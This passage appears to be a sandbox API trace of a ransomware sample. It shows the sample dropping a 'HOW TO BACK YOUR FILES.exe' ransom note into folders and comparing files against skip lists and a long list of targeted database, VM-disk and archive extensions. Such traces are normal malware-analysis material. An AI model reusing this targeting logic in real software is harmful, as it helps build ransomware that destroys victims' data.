ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.580] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.580] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0065.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" [0065.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0065.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0065.580] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned 56 [0065.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" [0065.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.581] GetLastError () returned 0x0 [0065.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.581] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.581] CloseHandle (hObject=0x12c) returned 1 [0065.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.581] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.581] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.581] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.581] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.581] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.581] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.581] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.581] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.581] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.582] lstrlenW (lpString="desktop.ini") returned 11 [0065.582] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\*") returned 58 [0065.582] lstrcpyW (in: lpString1=0x2cce472, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.582] lstrlenW (lpString="desktop.ini") returned 11 [0065.582] lstrlenW (lpString="Ares865") returned 7 [0065.582] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.582] lstrlenW (lpString=".dll") returned 4 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.582] lstrlenW (lpString=".lnk") returned 4 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.582] lstrlenW (lpString=".ini") returned 4 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.582] lstrlenW (lpString=".sys") returned 4 [0065.582] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.582] lstrlenW (lpString="desktop.ini") returned 11 [0065.582] lstrlenW (lpString="bak") returned 3 [0065.582] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.582] lstrlenW (lpString="ba_") returned 3 [0065.582] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.582] lstrlenW (lpString="dbb") returned 3 [0065.582] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.582] lstrlenW (lpString="vmdk") returned 4 [0065.582] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.582] lstrlenW (lpString="rar") returned 3 [0065.582] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.583] lstrlenW (lpString="zip") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.583] lstrlenW (lpString="tgz") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.583] lstrlenW (lpString="vbox") returned 4 [0065.583] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.583] lstrlenW (lpString="vdi") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.583] lstrlenW (lpString="vhd") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.583] lstrlenW (lpString="vhdx") returned 4 [0065.583] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.583] lstrlenW (lpString="avhd") returned 4 [0065.583] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.583] lstrlenW (lpString="db") returned 2 [0065.583] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.583] lstrlenW (lpString="db2") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.583] lstrlenW (lpString="db3") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.583] lstrlenW (lpString="dbf") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.583] lstrlenW (lpString="mdf") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.583] lstrlenW (lpString="mdb") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.583] lstrlenW (lpString="sql") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.583] lstrlenW (lpString="sqlite") returned 6 [0065.583] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.583] lstrlenW (lpString="sqlite3") returned 7 [0065.583] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.583] lstrlenW (lpString="sqlitedb") returned 8 [0065.583] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.583] lstrlenW (lpString="xml") returned 3 [0065.583] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.583] lstrlenW (lpString="$er") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.584] lstrlenW (lpString="4dd") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.584] lstrlenW (lpString="4dl") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.584] lstrlenW (lpString="^^^") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.584] lstrlenW (lpString="abs") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.584] lstrlenW (lpString="abx") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.584] lstrlenW (lpString="accdb") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.584] lstrlenW (lpString="accdc") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.584] lstrlenW (lpString="accde") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.584] lstrlenW (lpString="accdr") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.584] lstrlenW (lpString="accdt") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.584] lstrlenW (lpString="accdw") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.584] lstrlenW (lpString="accft") returned 5 [0065.584] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.584] lstrlenW (lpString="adb") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.584] lstrlenW (lpString="adb") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.584] lstrlenW (lpString="ade") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.584] lstrlenW (lpString="adf") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.584] lstrlenW (lpString="adn") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.584] lstrlenW (lpString="adp") returned 3 [0065.584] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.584] lstrlenW (lpString="alf") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.585] lstrlenW (lpString="ask") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.585] lstrlenW (lpString="btr") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.585] lstrlenW (lpString="cat") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.585] lstrlenW (lpString="cdb") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.585] lstrlenW (lpString="ckp") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.585] lstrlenW (lpString="cma") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.585] lstrlenW (lpString="cpd") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.585] lstrlenW (lpString="dacpac") returned 6 [0065.585] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.585] lstrlenW (lpString="dad") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.585] lstrlenW (lpString="dadiagrams") returned 10 [0065.585] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.585] lstrlenW (lpString="daschema") returned 8 [0065.585] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.585] lstrlenW (lpString="db-journal") returned 10 [0065.585] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.585] lstrlenW (lpString="db-shm") returned 6 [0065.585] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.585] lstrlenW (lpString="db-wal") returned 6 [0065.585] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.585] lstrlenW (lpString="dbc") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.585] lstrlenW (lpString="dbs") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.585] lstrlenW (lpString="dbt") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.585] lstrlenW (lpString="dbv") returned 3 [0065.585] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.586] lstrlenW (lpString="dbx") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.586] lstrlenW (lpString="dcb") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.586] lstrlenW (lpString="dct") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.586] lstrlenW (lpString="dcx") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.586] lstrlenW (lpString="ddl") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.586] lstrlenW (lpString="dlis") returned 4 [0065.586] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.586] lstrlenW (lpString="dp1") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.586] lstrlenW (lpString="dqy") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.586] lstrlenW (lpString="dsk") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.586] lstrlenW (lpString="dsn") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.586] lstrlenW (lpString="dtsx") returned 4 [0065.586] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.586] lstrlenW (lpString="dxl") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.586] lstrlenW (lpString="eco") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.586] lstrlenW (lpString="ecx") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.586] lstrlenW (lpString="edb") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.586] lstrlenW (lpString="epim") returned 4 [0065.586] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.586] lstrlenW (lpString="fcd") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.586] lstrlenW (lpString="fdb") returned 3 [0065.586] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.586] lstrlenW (lpString="fic") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.587] lstrlenW (lpString="flexolibrary") returned 12 [0065.587] lstrlenW (lpString="fm5") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.587] lstrlenW (lpString="fmp") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.587] lstrlenW (lpString="fmp12") returned 5 [0065.587] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.587] lstrlenW (lpString="fmpsl") returned 5 [0065.587] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.587] lstrlenW (lpString="fol") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.587] lstrlenW (lpString="fp3") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.587] lstrlenW (lpString="fp4") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.587] lstrlenW (lpString="fp5") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.587] lstrlenW (lpString="fp7") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.587] lstrlenW (lpString="fpt") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.587] lstrlenW (lpString="frm") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.587] lstrlenW (lpString="gdb") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.587] lstrlenW (lpString="gdb") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.587] lstrlenW (lpString="grdb") returned 4 [0065.587] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.587] lstrlenW (lpString="gwi") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.587] lstrlenW (lpString="hdb") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.587] lstrlenW (lpString="his") returned 3 [0065.587] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.588] lstrlenW (lpString="ib") returned 2 [0065.588] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.588] lstrlenW (lpString="idb") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.588] lstrlenW (lpString="ihx") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.588] lstrlenW (lpString="itdb") returned 4 [0065.588] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.588] lstrlenW (lpString="itw") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.588] lstrlenW (lpString="jet") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.588] lstrlenW (lpString="jtx") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.588] lstrlenW (lpString="kdb") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.588] lstrlenW (lpString="kexi") returned 4 [0065.588] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.588] lstrlenW (lpString="kexic") returned 5 [0065.588] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.588] lstrlenW (lpString="kexis") returned 5 [0065.588] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.588] lstrlenW (lpString="lgc") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.588] lstrlenW (lpString="lwx") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.588] lstrlenW (lpString="maf") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.588] lstrlenW (lpString="maq") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.588] lstrlenW (lpString="mar") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.588] lstrlenW (lpString="marshal") returned 7 [0065.588] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.588] lstrlenW (lpString="mas") returned 3 [0065.588] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.588] lstrlenW (lpString="mav") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.589] lstrlenW (lpString="maw") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.589] lstrlenW (lpString="mdbhtml") returned 7 [0065.589] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.589] lstrlenW (lpString="mdn") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.589] lstrlenW (lpString="mdt") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.589] lstrlenW (lpString="mfd") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.589] lstrlenW (lpString="mpd") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.589] lstrlenW (lpString="mrg") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.589] lstrlenW (lpString="mud") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.589] lstrlenW (lpString="mwb") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.589] lstrlenW (lpString="myd") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.589] lstrlenW (lpString="ndf") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.589] lstrlenW (lpString="nnt") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.589] lstrlenW (lpString="nrmlib") returned 6 [0065.589] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.589] lstrlenW (lpString="ns2") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.589] lstrlenW (lpString="ns3") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.589] lstrlenW (lpString="ns4") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.589] lstrlenW (lpString="nsf") returned 3 [0065.589] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.589] lstrlenW (lpString="nv") returned 2 [0065.589] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.590] lstrlenW (lpString="nv2") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.590] lstrlenW (lpString="nwdb") returned 4 [0065.590] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.590] lstrlenW (lpString="nyf") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.590] lstrlenW (lpString="odb") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.590] lstrlenW (lpString="odb") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.590] lstrlenW (lpString="oqy") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.590] lstrlenW (lpString="ora") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.590] lstrlenW (lpString="orx") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.590] lstrlenW (lpString="owc") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.590] lstrlenW (lpString="p96") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.590] lstrlenW (lpString="p97") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.590] lstrlenW (lpString="pan") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.590] lstrlenW (lpString="pdb") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.590] lstrlenW (lpString="pdm") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.590] lstrlenW (lpString="pnz") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.590] lstrlenW (lpString="qry") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.590] lstrlenW (lpString="qvd") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.590] lstrlenW (lpString="rbf") returned 3 [0065.590] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.590] lstrlenW (lpString="rctd") returned 4 [0065.591] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.591] lstrlenW (lpString="rod") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.591] lstrlenW (lpString="rodx") returned 4 [0065.591] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.591] lstrlenW (lpString="rpd") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.591] lstrlenW (lpString="rsd") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.591] lstrlenW (lpString="sas7bdat") returned 8 [0065.591] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.591] lstrlenW (lpString="sbf") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.591] lstrlenW (lpString="scx") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.591] lstrlenW (lpString="sdb") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.591] lstrlenW (lpString="sdc") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.591] lstrlenW (lpString="sdf") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.591] lstrlenW (lpString="sis") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.591] lstrlenW (lpString="spq") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.591] lstrlenW (lpString="te") returned 2 [0065.591] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.591] lstrlenW (lpString="teacher") returned 7 [0065.591] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.591] lstrlenW (lpString="tmd") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.591] lstrlenW (lpString="tps") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.591] lstrlenW (lpString="trc") returned 3 [0065.591] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.591] lstrlenW (lpString="trc") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.592] lstrlenW (lpString="trm") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.592] lstrlenW (lpString="udb") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.592] lstrlenW (lpString="udl") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.592] lstrlenW (lpString="usr") returned 3 [0065.592] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.592] lstrlenW (lpString="v12") returned 3 